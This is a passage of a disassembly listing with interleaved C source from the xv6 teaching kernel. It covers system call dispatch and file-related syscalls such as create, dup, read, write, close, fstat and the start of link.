50 push %eax 80104a5a: ff 75 08 pushl 0x8(%ebp) 80104a5d: e8 3e ff ff ff call 801049a0 <argint> 80104a62: 83 c4 10 add $0x10,%esp 80104a65: 85 c0 test %eax,%eax 80104a67: 78 17 js 80104a80 <argstr+0x30> return -1; return fetchstr(addr, pp); 80104a69: 83 ec 08 sub $0x8,%esp 80104a6c: ff 75 0c pushl 0xc(%ebp) 80104a6f: ff 75 f4 pushl -0xc(%ebp) 80104a72: e8 c9 fe ff ff call 80104940 <fetchstr> 80104a77: 83 c4 10 add $0x10,%esp } 80104a7a: c9 leave 80104a7b: c3 ret 80104a7c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi int argstr(int n, char **pp) { int addr; if(argint(n, &addr) < 0) return -1; 80104a80: b8 ff ff ff ff mov $0xffffffff,%eax return fetchstr(addr, pp); } 80104a85: c9 leave 80104a86: c3 ret 80104a87: 89 f6 mov %esi,%esi 80104a89: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104a90 <syscall>: [SYS_adress] sys_adress, }; void syscall(void) { 80104a90: 55 push %ebp 80104a91: 89 e5 mov %esp,%ebp 80104a93: 56 push %esi 80104a94: 53 push %ebx int num; struct proc *curproc = myproc(); 80104a95: e8 e6 ec ff ff call 80103780 <myproc> num = curproc->tf->eax; 80104a9a: 8b 70 18 mov 0x18(%eax),%esi void syscall(void) { int num; struct proc *curproc = myproc(); 80104a9d: 89 c3 mov %eax,%ebx num = curproc->tf->eax; 80104a9f: 8b 46 1c mov 0x1c(%esi),%eax if(num > 0 && num < NELEM(syscalls) && syscalls[num]) { 80104aa2: 8d 50 ff lea -0x1(%eax),%edx 80104aa5: 83 fa 15 cmp $0x15,%edx 80104aa8: 77 1e ja 80104ac8 <syscall+0x38> 80104aaa: 8b 14 85 80 79 10 80 mov -0x7fef8680(,%eax,4),%edx 80104ab1: 85 d2 test %edx,%edx 80104ab3: 74 13 je 80104ac8 <syscall+0x38> curproc->tf->eax = syscalls[num](); 80104ab5: ff d2 call *%edx 80104ab7: 89 46 1c mov %eax,0x1c(%esi) } else { cprintf("%d %s: unknown sys call %d\n", curproc->pid, curproc->name, num); curproc->tf->eax = -1; } } 80104aba: 8d 65 f8 lea -0x8(%ebp),%esp 80104abd: 5b pop %ebx 80104abe: 5e pop %esi 80104abf: 5d pop %ebp 80104ac0: c3 ret 80104ac1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi num = curproc->tf->eax; if(num > 0 && num < NELEM(syscalls) && syscalls[num]) { curproc->tf->eax = syscalls[num](); } else { cprintf("%d %s: unknown sys call %d\n", 80104ac8: 50 push %eax curproc->pid, curproc->name, num); 80104ac9: 8d 43 6c lea 0x6c(%ebx),%eax num = curproc->tf->eax; if(num > 0 && num < NELEM(syscalls) && syscalls[num]) { curproc->tf->eax = syscalls[num](); } else { cprintf("%d %s: unknown sys call %d\n", 80104acc: 50 push %eax 80104acd: ff 73 10 pushl 0x10(%ebx) 80104ad0: 68 5d 79 10 80 push $0x8010795d 80104ad5: e8 86 bb ff ff call 80100660 <cprintf> curproc->pid, curproc->name, num); curproc->tf->eax = -1; 80104ada: 8b 43 18 mov 0x18(%ebx),%eax 80104add: 83 c4 10 add $0x10,%esp 80104ae0: c7 40 1c ff ff ff ff movl $0xffffffff,0x1c(%eax) } } 80104ae7: 8d 65 f8 lea -0x8(%ebp),%esp 80104aea: 5b pop %ebx 80104aeb: 5e pop %esi 80104aec: 5d pop %ebp 80104aed: c3 ret 80104aee: 66 90 xchg %ax,%ax 80104af0 <create>: return -1; } static struct inode* create(char *path, short type, short major, short minor) { 80104af0: 55 push %ebp 80104af1: 89 e5 mov %esp,%ebp 80104af3: 57 push %edi 80104af4: 56 push %esi 80104af5: 53 push %ebx uint off; struct inode *ip, *dp; char name[DIRSIZ]; if((dp = nameiparent(path, name)) == 0) 80104af6: 8d 75 da lea -0x26(%ebp),%esi return -1; } static struct inode* create(char *path, short type, short major, short minor) { 80104af9: 83 ec 44 sub $0x44,%esp 80104afc: 89 4d c0 mov %ecx,-0x40(%ebp) 80104aff: 8b 4d 08 mov 0x8(%ebp),%ecx uint off; struct inode *ip, *dp; char name[DIRSIZ]; if((dp = nameiparent(path, name)) == 0) 80104b02: 56 push %esi 80104b03: 50 push %eax return -1; } static struct inode* create(char *path, short type, short major, short minor) { 80104b04: 89 55 c4 mov %edx,-0x3c(%ebp) 80104b07: 89 4d bc mov %ecx,-0x44(%ebp) uint off; struct inode *ip, *dp; char name[DIRSIZ]; if((dp = nameiparent(path, name)) == 0) 80104b0a: e8 d1 d3 ff ff call 80101ee0 <nameiparent> 80104b0f: 83 c4 10 add $0x10,%esp 80104b12: 85 c0 test %eax,%eax 80104b14: 0f 84 f6 00 00 00 je 80104c10 <create+0x120> return 0; ilock(dp); 80104b1a: 83 ec 0c sub $0xc,%esp 80104b1d: 89 c7 mov %eax,%edi 80104b1f: 50 push %eax 80104b20: e8 4b cb ff ff call 80101670 <ilock> if((ip = dirlookup(dp, name, &off)) != 0){ 80104b25: 8d 45 d4 lea -0x2c(%ebp),%eax 80104b28: 83 c4 0c add $0xc,%esp 80104b2b: 50 push %eax 80104b2c: 56 push %esi 80104b2d: 57 push %edi 80104b2e: e8 6d d0 ff ff call 80101ba0 <dirlookup> 80104b33: 83 c4 10 add $0x10,%esp 80104b36: 85 c0 test %eax,%eax 80104b38: 89 c3 mov %eax,%ebx 80104b3a: 74 54 je 80104b90 <create+0xa0> iunlockput(dp); 80104b3c: 83 ec 0c sub $0xc,%esp 80104b3f: 57 push %edi 80104b40: e8 bb cd ff ff call 80101900 <iunlockput> ilock(ip); 80104b45: 89 1c 24 mov %ebx,(%esp) 80104b48: e8 23 cb ff ff call 80101670 <ilock> if(type == T_FILE && ip->type == T_FILE) 80104b4d: 83 c4 10 add $0x10,%esp 80104b50: 66 83 7d c4 02 cmpw $0x2,-0x3c(%ebp) 80104b55: 75 19 jne 80104b70 <create+0x80> 80104b57: 66 83 7b 50 02 cmpw $0x2,0x50(%ebx) 80104b5c: 89 d8 mov %ebx,%eax 80104b5e: 75 10 jne 80104b70 <create+0x80> panic("create: dirlink"); iunlockput(dp); return ip; } 80104b60: 8d 65 f4 lea -0xc(%ebp),%esp 80104b63: 5b pop %ebx 80104b64: 5e pop %esi 80104b65: 5f pop %edi 80104b66: 5d pop %ebp 80104b67: c3 ret 80104b68: 90 nop 80104b69: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi if((ip = dirlookup(dp, name, &off)) != 0){ iunlockput(dp); ilock(ip); if(type == T_FILE && ip->type == T_FILE) return ip; iunlockput(ip); 80104b70: 83 ec 0c sub $0xc,%esp 80104b73: 53 push %ebx 80104b74: e8 87 cd ff ff call 80101900 <iunlockput> return 0; 80104b79: 83 c4 10 add $0x10,%esp panic("create: dirlink"); iunlockput(dp); return ip; } 80104b7c: 8d 65 f4 lea -0xc(%ebp),%esp iunlockput(dp); ilock(ip); if(type == T_FILE && ip->type == T_FILE) return ip; iunlockput(ip); return 0; 80104b7f: 31 c0 xor %eax,%eax panic("create: dirlink"); iunlockput(dp); return ip; } 80104b81: 5b pop %ebx 80104b82: 5e pop %esi 80104b83: 5f pop %edi 80104b84: 5d pop %ebp 80104b85: c3 ret 80104b86: 8d 76 00 lea 0x0(%esi),%esi 80104b89: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi return ip; iunlockput(ip); return 0; } if((ip = ialloc(dp->dev, type)) == 0) 80104b90: 0f bf 45 c4 movswl -0x3c(%ebp),%eax 80104b94: 83 ec 08 sub $0x8,%esp 80104b97: 50 push %eax 80104b98: ff 37 pushl (%edi) 80104b9a: e8 61 c9 ff ff call 80101500 <ialloc> 80104b9f: 83 c4 10 add $0x10,%esp 80104ba2: 85 c0 test %eax,%eax 80104ba4: 89 c3 mov %eax,%ebx 80104ba6: 0f 84 cc 00 00 00 je 80104c78 <create+0x188> panic("create: ialloc"); ilock(ip); 80104bac: 83 ec 0c sub $0xc,%esp 80104baf: 50 push %eax 80104bb0: e8 bb ca ff ff call 80101670 <ilock> ip->major = major; 80104bb5: 0f b7 45 c0 movzwl -0x40(%ebp),%eax 80104bb9: 66 89 43 52 mov %ax,0x52(%ebx) ip->minor = minor; 80104bbd: 0f b7 45 bc movzwl -0x44(%ebp),%eax 80104bc1: 66 89 43 54 mov %ax,0x54(%ebx) ip->nlink = 1; 80104bc5: b8 01 00 00 00 mov $0x1,%eax 80104bca: 66 89 43 56 mov %ax,0x56(%ebx) iupdate(ip); 80104bce: 89 1c 24 mov %ebx,(%esp) 80104bd1: e8 ea c9 ff ff call 801015c0 <iupdate> if(type == T_DIR){ // Create . and .. entries. 80104bd6: 83 c4 10 add $0x10,%esp 80104bd9: 66 83 7d c4 01 cmpw $0x1,-0x3c(%ebp) 80104bde: 74 40 je 80104c20 <create+0x130> // No ip->nlink++ for ".": avoid cyclic ref count. if(dirlink(ip, ".", ip->inum) < 0 || dirlink(ip, "..", dp->inum) < 0) panic("create dots"); } if(dirlink(dp, name, ip->inum) < 0) 80104be0: 83 ec 04 sub $0x4,%esp 80104be3: ff 73 04 pushl 0x4(%ebx) 80104be6: 56 push %esi 80104be7: 57 push %edi 80104be8: e8 13 d2 ff ff call 80101e00 <dirlink> 80104bed: 83 c4 10 add $0x10,%esp 80104bf0: 85 c0 test %eax,%eax 80104bf2: 78 77 js 80104c6b <create+0x17b> panic("create: dirlink"); iunlockput(dp); 80104bf4: 83 ec 0c sub $0xc,%esp 80104bf7: 57 push %edi 80104bf8: e8 03 cd ff ff call 80101900 <iunlockput> return ip; 80104bfd: 83 c4 10 add $0x10,%esp } 80104c00: 8d 65 f4 lea -0xc(%ebp),%esp if(dirlink(dp, name, ip->inum) < 0) panic("create: dirlink"); iunlockput(dp); return ip; 80104c03: 89 d8 mov %ebx,%eax } 80104c05: 5b pop %ebx 80104c06: 5e pop %esi 80104c07: 5f pop %edi 80104c08: 5d pop %ebp 80104c09: c3 ret 80104c0a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi uint off; struct inode *ip, *dp; char name[DIRSIZ]; if((dp = nameiparent(path, name)) == 0) return 0; 80104c10: 31 c0 xor %eax,%eax 80104c12: e9 49 ff ff ff jmp 80104b60 <create+0x70> 80104c17: 89 f6 mov %esi,%esi 80104c19: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi ip->minor = minor; ip->nlink = 1; iupdate(ip); if(type == T_DIR){ // Create . and .. entries. dp->nlink++; // for ".." 80104c20: 66 83 47 56 01 addw $0x1,0x56(%edi) iupdate(dp); 80104c25: 83 ec 0c sub $0xc,%esp 80104c28: 57 push %edi 80104c29: e8 92 c9 ff ff call 801015c0 <iupdate> // No ip->nlink++ for ".": avoid cyclic ref count. if(dirlink(ip, ".", ip->inum) < 0 || dirlink(ip, "..", dp->inum) < 0) 80104c2e: 83 c4 0c add $0xc,%esp 80104c31: ff 73 04 pushl 0x4(%ebx) 80104c34: 68 f8 79 10 80 push $0x801079f8 80104c39: 53 push %ebx 80104c3a: e8 c1 d1 ff ff call 80101e00 <dirlink> 80104c3f: 83 c4 10 add $0x10,%esp 80104c42: 85 c0 test %eax,%eax 80104c44: 78 18 js 80104c5e <create+0x16e> 80104c46: 83 ec 04 sub $0x4,%esp 80104c49: ff 77 04 pushl 0x4(%edi) 80104c4c: 68 f7 79 10 80 push $0x801079f7 80104c51: 53 push %ebx 80104c52: e8 a9 d1 ff ff call 80101e00 <dirlink> 80104c57: 83 c4 10 add $0x10,%esp 80104c5a: 85 c0 test %eax,%eax 80104c5c: 79 82 jns 80104be0 <create+0xf0> panic("create dots"); 80104c5e: 83 ec 0c sub $0xc,%esp 80104c61: 68 eb 79 10 80 push $0x801079eb 80104c66: e8 05 b7 ff ff call 80100370 <panic> } if(dirlink(dp, name, ip->inum) < 0) panic("create: dirlink"); 80104c6b: 83 ec 0c sub $0xc,%esp 80104c6e: 68 fa 79 10 80 push $0x801079fa 80104c73: e8 f8 b6 ff ff call 80100370 <panic> iunlockput(ip); return 0; } if((ip = ialloc(dp->dev, type)) == 0) panic("create: ialloc"); 80104c78: 83 ec 0c sub $0xc,%esp 80104c7b: 68 dc 79 10 80 push $0x801079dc 80104c80: e8 eb b6 ff ff call 80100370 <panic> 80104c85: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80104c89: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104c90 <argfd.constprop.0>: #include "fcntl.h" // Fetch the nth word-sized system call argument as a file descriptor // and return both the descriptor and the corresponding struct file. static int argfd(int n, int *pfd, struct file **pf) 80104c90: 55 push %ebp 80104c91: 89 e5 mov %esp,%ebp 80104c93: 56 push %esi 80104c94: 53 push %ebx 80104c95: 89 c6 mov %eax,%esi { int fd; struct file *f; if(argint(n, &fd) < 0) 80104c97: 8d 45 f4 lea -0xc(%ebp),%eax #include "fcntl.h" // Fetch the nth word-sized system call argument as a file descriptor // and return both the descriptor and the corresponding struct file. static int argfd(int n, int *pfd, struct file **pf) 80104c9a: 89 d3 mov %edx,%ebx 80104c9c: 83 ec 18 sub $0x18,%esp { int fd; struct file *f; if(argint(n, &fd) < 0) 80104c9f: 50 push %eax 80104ca0: 6a 00 push $0x0 80104ca2: e8 f9 fc ff ff call 801049a0 <argint> 80104ca7: 83 c4 10 add $0x10,%esp 80104caa: 85 c0 test %eax,%eax 80104cac: 78 32 js 80104ce0 <argfd.constprop.0+0x50> return -1; if(fd < 0 || fd >= NOFILE || (f=myproc()->ofile[fd]) == 0) 80104cae: 83 7d f4 0f cmpl $0xf,-0xc(%ebp) 80104cb2: 77 2c ja 80104ce0 <argfd.constprop.0+0x50> 80104cb4: e8 c7 ea ff ff call 80103780 <myproc> 80104cb9: 8b 55 f4 mov -0xc(%ebp),%edx 80104cbc: 8b 44 90 28 mov 0x28(%eax,%edx,4),%eax 80104cc0: 85 c0 test %eax,%eax 80104cc2: 74 1c je 80104ce0 <argfd.constprop.0+0x50> return -1; if(pfd) 80104cc4: 85 f6 test %esi,%esi 80104cc6: 74 02 je 80104cca <argfd.constprop.0+0x3a> *pfd = fd; 80104cc8: 89 16 mov %edx,(%esi) if(pf) 80104cca: 85 db test %ebx,%ebx 80104ccc: 74 22 je 80104cf0 <argfd.constprop.0+0x60> *pf = f; 80104cce: 89 03 mov %eax,(%ebx) return 0; 80104cd0: 31 c0 xor %eax,%eax } 80104cd2: 8d 65 f8 lea -0x8(%ebp),%esp 80104cd5: 5b pop %ebx 80104cd6: 5e pop %esi 80104cd7: 5d pop %ebp 80104cd8: c3 ret 80104cd9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80104ce0: 8d 65 f8 lea -0x8(%ebp),%esp { int fd; struct file *f; if(argint(n, &fd) < 0) return -1; 80104ce3: b8 ff ff ff ff mov $0xffffffff,%eax if(pfd) *pfd = fd; if(pf) *pf = f; return 0; } 80104ce8: 5b pop %ebx 80104ce9: 5e pop %esi 80104cea: 5d pop %ebp 80104ceb: c3 ret 80104cec: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi return -1; if(pfd) *pfd = fd; if(pf) *pf = f; return 0; 80104cf0: 31 c0 xor %eax,%eax 80104cf2: eb de jmp 80104cd2 <argfd.constprop.0+0x42> 80104cf4: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80104cfa: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 80104d00 <sys_dup>: return -1; } int sys_dup(void) { 80104d00: 55 push %ebp struct file *f; int fd; if(argfd(0, 0, &f) < 0) 80104d01: 31 c0 xor %eax,%eax return -1; } int sys_dup(void) { 80104d03: 89 e5 mov %esp,%ebp 80104d05: 56 push %esi 80104d06: 53 push %ebx struct file *f; int fd; if(argfd(0, 0, &f) < 0) 80104d07: 8d 55 f4 lea -0xc(%ebp),%edx return -1; } int sys_dup(void) { 80104d0a: 83 ec 10 sub $0x10,%esp struct file *f; int fd; if(argfd(0, 0, &f) < 0) 80104d0d: e8 7e ff ff ff call 80104c90 <argfd.constprop.0> 80104d12: 85 c0 test %eax,%eax 80104d14: 78 1a js 80104d30 <sys_dup+0x30> fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ 80104d16: 31 db xor %ebx,%ebx struct file *f; int fd; if(argfd(0, 0, &f) < 0) return -1; if((fd=fdalloc(f)) < 0) 80104d18: 8b 75 f4 mov -0xc(%ebp),%esi // Takes over file reference from caller on success. static int fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); 80104d1b: e8 60 ea ff ff call 80103780 <myproc> for(fd = 0; fd < NOFILE; fd++){ if(curproc->ofile[fd] == 0){ 80104d20: 8b 54 98 28 mov 0x28(%eax,%ebx,4),%edx 80104d24: 85 d2 test %edx,%edx 80104d26: 74 18 je 80104d40 <sys_dup+0x40> fdalloc(struct file *f) { int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ 80104d28: 83 c3 01 add $0x1,%ebx 80104d2b: 83 fb 10 cmp $0x10,%ebx 80104d2e: 75 f0 jne 80104d20 <sys_dup+0x20> return -1; if((fd=fdalloc(f)) < 0) return -1; filedup(f); return fd; } 80104d30: 8d 65 f8 lea -0x8(%ebp),%esp { struct file *f; int fd; if(argfd(0, 0, &f) < 0) return -1; 80104d33: b8 ff ff ff ff mov $0xffffffff,%eax if((fd=fdalloc(f)) < 0) return -1; filedup(f); return fd; } 80104d38: 5b pop %ebx 80104d39: 5e pop %esi 80104d3a: 5d pop %ebp 80104d3b: c3 ret 80104d3c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi int fd; struct proc *curproc = myproc(); for(fd = 0; fd < NOFILE; fd++){ if(curproc->ofile[fd] == 0){ curproc->ofile[fd] = f; 80104d40: 89 74 98 28 mov %esi,0x28(%eax,%ebx,4) if(argfd(0, 0, &f) < 0) return -1; if((fd=fdalloc(f)) < 0) return -1; filedup(f); 80104d44: 83 ec 0c sub $0xc,%esp 80104d47: ff 75 f4 pushl -0xc(%ebp) 80104d4a: e8 91 c0 ff ff call 80100de0 <filedup> return fd; 80104d4f: 83 c4 10 add $0x10,%esp } 80104d52: 8d 65 f8 lea -0x8(%ebp),%esp if(argfd(0, 0, &f) < 0) return -1; if((fd=fdalloc(f)) < 0) return -1; filedup(f); return fd; 80104d55: 89 d8 mov %ebx,%eax } 80104d57: 5b pop %ebx 80104d58: 5e pop %esi 80104d59: 5d pop %ebp 80104d5a: c3 ret 80104d5b: 90 nop 80104d5c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80104d60 <sys_read>: int sys_read(void) { 80104d60: 55 push %ebp struct file *f; int n; char *p; if(argfd(0, 0, &f) < 0 || argint(2, &n) < 0 || argptr(1, &p, n) < 0) 80104d61: 31 c0 xor %eax,%eax return fd; } int sys_read(void) { 80104d63: 89 e5 mov %esp,%ebp 80104d65: 83 ec 18 sub $0x18,%esp struct file *f; int n; char *p; if(argfd(0, 0, &f) < 0 || argint(2, &n) < 0 || argptr(1, &p, n) < 0) 80104d68: 8d 55 ec lea -0x14(%ebp),%edx 80104d6b: e8 20 ff ff ff call 80104c90 <argfd.constprop.0> 80104d70: 85 c0 test %eax,%eax 80104d72: 78 4c js 80104dc0 <sys_read+0x60> 80104d74: 8d 45 f0 lea -0x10(%ebp),%eax 80104d77: 83 ec 08 sub $0x8,%esp 80104d7a: 50 push %eax 80104d7b: 6a 02 push $0x2 80104d7d: e8 1e fc ff ff call 801049a0 <argint> 80104d82: 83 c4 10 add $0x10,%esp 80104d85: 85 c0 test %eax,%eax 80104d87: 78 37 js 80104dc0 <sys_read+0x60> 80104d89: 8d 45 f4 lea -0xc(%ebp),%eax 80104d8c: 83 ec 04 sub $0x4,%esp 80104d8f: ff 75 f0 pushl -0x10(%ebp) 80104d92: 50 push %eax 80104d93: 6a 01 push $0x1 80104d95: e8 56 fc ff ff call 801049f0 <argptr> 80104d9a: 83 c4 10 add $0x10,%esp 80104d9d: 85 c0 test %eax,%eax 80104d9f: 78 1f js 80104dc0 <sys_read+0x60> return -1; return fileread(f, p, n); 80104da1: 83 ec 04 sub $0x4,%esp 80104da4: ff 75 f0 pushl -0x10(%ebp) 80104da7: ff 75 f4 pushl -0xc(%ebp) 80104daa: ff 75 ec pushl -0x14(%ebp) 80104dad: e8 9e c1 ff ff call 80100f50 <fileread> 80104db2: 83 c4 10 add $0x10,%esp } 80104db5: c9 leave 80104db6: c3 ret 80104db7: 89 f6 mov %esi,%esi 80104db9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi struct file *f; int n; char *p; if(argfd(0, 0, &f) < 0 || argint(2, &n) < 0 || argptr(1, &p, n) < 0) return -1; 80104dc0: b8 ff ff ff ff mov $0xffffffff,%eax return fileread(f, p, n); } 80104dc5: c9 leave 80104dc6: c3 ret 80104dc7: 89 f6 mov %esi,%esi 80104dc9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104dd0 <sys_write>: int sys_write(void) { 80104dd0: 55 push %ebp struct file *f; int n; char *p; if(argfd(0, 0, &f) < 0 || argint(2, &n) < 0 || argptr(1, &p, n) < 0) 80104dd1: 31 c0 xor %eax,%eax return fileread(f, p, n); } int sys_write(void) { 80104dd3: 89 e5 mov %esp,%ebp 80104dd5: 83 ec 18 sub $0x18,%esp struct file *f; int n; char *p; if(argfd(0, 0, &f) < 0 || argint(2, &n) < 0 || argptr(1, &p, n) < 0) 80104dd8: 8d 55 ec lea -0x14(%ebp),%edx 80104ddb: e8 b0 fe ff ff call 80104c90 <argfd.constprop.0> 80104de0: 85 c0 test %eax,%eax 80104de2: 78 4c js 80104e30 <sys_write+0x60> 80104de4: 8d 45 f0 lea -0x10(%ebp),%eax 80104de7: 83 ec 08 sub $0x8,%esp 80104dea: 50 push %eax 80104deb: 6a 02 push $0x2 80104ded: e8 ae fb ff ff call 801049a0 <argint> 80104df2: 83 c4 10 add $0x10,%esp 80104df5: 85 c0 test %eax,%eax 80104df7: 78 37 js 80104e30 <sys_write+0x60> 80104df9: 8d 45 f4 lea -0xc(%ebp),%eax 80104dfc: 83 ec 04 sub $0x4,%esp 80104dff: ff 75 f0 pushl -0x10(%ebp) 80104e02: 50 push %eax 80104e03: 6a 01 push $0x1 80104e05: e8 e6 fb ff ff call 801049f0 <argptr> 80104e0a: 83 c4 10 add $0x10,%esp 80104e0d: 85 c0 test %eax,%eax 80104e0f: 78 1f js 80104e30 <sys_write+0x60> return -1; return filewrite(f, p, n); 80104e11: 83 ec 04 sub $0x4,%esp 80104e14: ff 75 f0 pushl -0x10(%ebp) 80104e17: ff 75 f4 pushl -0xc(%ebp) 80104e1a: ff 75 ec pushl -0x14(%ebp) 80104e1d: e8 be c1 ff ff call 80100fe0 <filewrite> 80104e22: 83 c4 10 add $0x10,%esp } 80104e25: c9 leave 80104e26: c3 ret 80104e27: 89 f6 mov %esi,%esi 80104e29: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi struct file *f; int n; char *p; if(argfd(0, 0, &f) < 0 || argint(2, &n) < 0 || argptr(1, &p, n) < 0) return -1; 80104e30: b8 ff ff ff ff mov $0xffffffff,%eax return filewrite(f, p, n); } 80104e35: c9 leave 80104e36: c3 ret 80104e37: 89 f6 mov %esi,%esi 80104e39: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104e40 <sys_close>: int sys_close(void) { 80104e40: 55 push %ebp 80104e41: 89 e5 mov %esp,%ebp 80104e43: 83 ec 18 sub $0x18,%esp int fd; struct file *f; if(argfd(0, &fd, &f) < 0) 80104e46: 8d 55 f4 lea -0xc(%ebp),%edx 80104e49: 8d 45 f0 lea -0x10(%ebp),%eax 80104e4c: e8 3f fe ff ff call 80104c90 <argfd.constprop.0> 80104e51: 85 c0 test %eax,%eax 80104e53: 78 2b js 80104e80 <sys_close+0x40> return -1; myproc()->ofile[fd] = 0; 80104e55: e8 26 e9 ff ff call 80103780 <myproc> 80104e5a: 8b 55 f0 mov -0x10(%ebp),%edx fileclose(f); 80104e5d: 83 ec 0c sub $0xc,%esp int fd; struct file *f; if(argfd(0, &fd, &f) < 0) return -1; myproc()->ofile[fd] = 0; 80104e60: c7 44 90 28 00 00 00 movl $0x0,0x28(%eax,%edx,4) 80104e67: 00 fileclose(f); 80104e68: ff 75 f4 pushl -0xc(%ebp) 80104e6b: e8 c0 bf ff ff call 80100e30 <fileclose> return 0; 80104e70: 83 c4 10 add $0x10,%esp 80104e73: 31 c0 xor %eax,%eax } 80104e75: c9 leave 80104e76: c3 ret 80104e77: 89 f6 mov %esi,%esi 80104e79: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi { int fd; struct file *f; if(argfd(0, &fd, &f) < 0) return -1; 80104e80: b8 ff ff ff ff mov $0xffffffff,%eax myproc()->ofile[fd] = 0; fileclose(f); return 0; } 80104e85: c9 leave 80104e86: c3 ret 80104e87: 89 f6 mov %esi,%esi 80104e89: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104e90 <sys_fstat>: int sys_fstat(void) { 80104e90: 55 push %ebp struct file *f; struct stat *st; if(argfd(0, 0, &f) < 0 || argptr(1, (void*)&st, sizeof(*st)) < 0) 80104e91: 31 c0 xor %eax,%eax return 0; } int sys_fstat(void) { 80104e93: 89 e5 mov %esp,%ebp 80104e95: 83 ec 18 sub $0x18,%esp struct file *f; struct stat *st; if(argfd(0, 0, &f) < 0 || argptr(1, (void*)&st, sizeof(*st)) < 0) 80104e98: 8d 55 f0 lea -0x10(%ebp),%edx 80104e9b: e8 f0 fd ff ff call 80104c90 <argfd.constprop.0> 80104ea0: 85 c0 test %eax,%eax 80104ea2: 78 2c js 80104ed0 <sys_fstat+0x40> 80104ea4: 8d 45 f4 lea -0xc(%ebp),%eax 80104ea7: 83 ec 04 sub $0x4,%esp 80104eaa: 6a 14 push $0x14 80104eac: 50 push %eax 80104ead: 6a 01 push $0x1 80104eaf: e8 3c fb ff ff call 801049f0 <argptr> 80104eb4: 83 c4 10 add $0x10,%esp 80104eb7: 85 c0 test %eax,%eax 80104eb9: 78 15 js 80104ed0 <sys_fstat+0x40> return -1; return filestat(f, st); 80104ebb: 83 ec 08 sub $0x8,%esp 80104ebe: ff 75 f4 pushl -0xc(%ebp) 80104ec1: ff 75 f0 pushl -0x10(%ebp) 80104ec4: e8 37 c0 ff ff call 80100f00 <filestat> 80104ec9: 83 c4 10 add $0x10,%esp } 80104ecc: c9 leave 80104ecd: c3 ret 80104ece: 66 90 xchg %ax,%ax { struct file *f; struct stat *st; if(argfd(0, 0, &f) < 0 || argptr(1, (void*)&st, sizeof(*st)) < 0) return -1; 80104ed0: b8 ff ff ff ff mov $0xffffffff,%eax return filestat(f, st); } 80104ed5: c9 leave 80104ed6: c3 ret 80104ed7: 89 f6 mov %esi,%esi 80104ed9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104ee0 <sys_link>: // Create the path new as a link to the same inode as old. int sys_link(void) { 80104ee0: 55 push %ebp 80104ee1: 89 e5 mov %esp,%ebp 80104ee3: 57 push %edi 80104ee4: 56 push %esi 80104ee5: 53 push %ebx char name[DIRSIZ], *new, *old; struct inode *dp, *ip; if(argstr(0, &old) < 0 || argstr(1, &new) < 0) 80104ee6: 8d 45 d4 lea -0x2c(%ebp),%eax } // Create the path new as a link to the same inode as old. int sys_link(void) { 80104ee9: 83 ec 34 sub $0x34,%esp char name[DIRSIZ], *new, *old; struct inode *dp, *ip; if(argstr(0, &old) < 0 || argstr(1, &new) < 0) 80104eec: 50 push %eax 80104eed: 6a 00 push $0x0 80104eef: e8 5c fb ff ff call 80104a50 <argstr> 80104ef4: 83 c4 10 add $0x10,%esp 80104ef7: 85 c0 test %eax,%eax 80104ef9: 0f 88 fb 00 00 00 js 80104ffa <sys_link+0x11a> 80104eff: 8d 45 d0 lea -0x30(%ebp),%eax 80104f02: 83 ec 08 sub $0x8,%esp 80104f05: 50 push %eax 80104f06: 6a 01 push $0x1 80104f08: e8 43 fb ff ff call 80104a50 <argstr> 80104f0d: 83 c4 10 add $0x10,%esp 80104f10: 85 c0 test %eax,%eax 80104f12: 0f 88 e2 00 00 00 js 80104ffa <sys_link+0x11a> return -1; begin_op(); 80104f18: e8 33 dc ff ff call 80102b50 <begin_op> if((ip = namei(old)) == 0){ 80104f1d: 83 ec 0c sub $0xc,%esp 80104f20: ff 75 d4 pushl -0x2c(%ebp) 80104f23: e8 98 cf ff ff call 80101ec0 <namei> 80104f28: 83 c4 10 add $0x10,%esp 80104f2b: 85 c0 test %eax,%eax 80104f2d: 89 c3 mov %eax,%ebx 80104f2f: 0f 84 f3 00 00 00 je 80105028 <sys_link+0x148> end_op(); return -1; } ilock(ip); 80104f35: 83 ec 0c sub $0xc,%esp 80104f38: 50 push %eax 80104f39: e8 32 c7 ff ff call 80101670 <ilock> if(ip->type == T_DIR){ 80104f3e: 83 c4 10 add $0x10,%esp 80104f41: 66 83 7b 50 01 cmpw $0x1,0x50(%ebx) 80104f46: 0f 84 c4 00 00 00 je 80105010 <sys_link+0x130> iunlockput(ip); end_op(); return -1; } ip->nlink++; 80104f4c: 66 83 43 56 01 addw $0x1,0x56(%ebx) iupdate(ip); 80104f51: 83 ec 0c sub $0xc,%esp iunlock(ip); if((dp = nameiparent(new, name)) == 0) 80104f54: 8d 7d da lea -0x26(%ebp),%edi end_op(); return -1; } ip->nlink++; iupdate(ip); 80104f57: 53 push %ebx 80104f58: e8 63 c6 ff ff call 801015c0 <iupdate> iunlock(ip); 80104f5d: 89 1c 24 mov %ebx,(%esp) 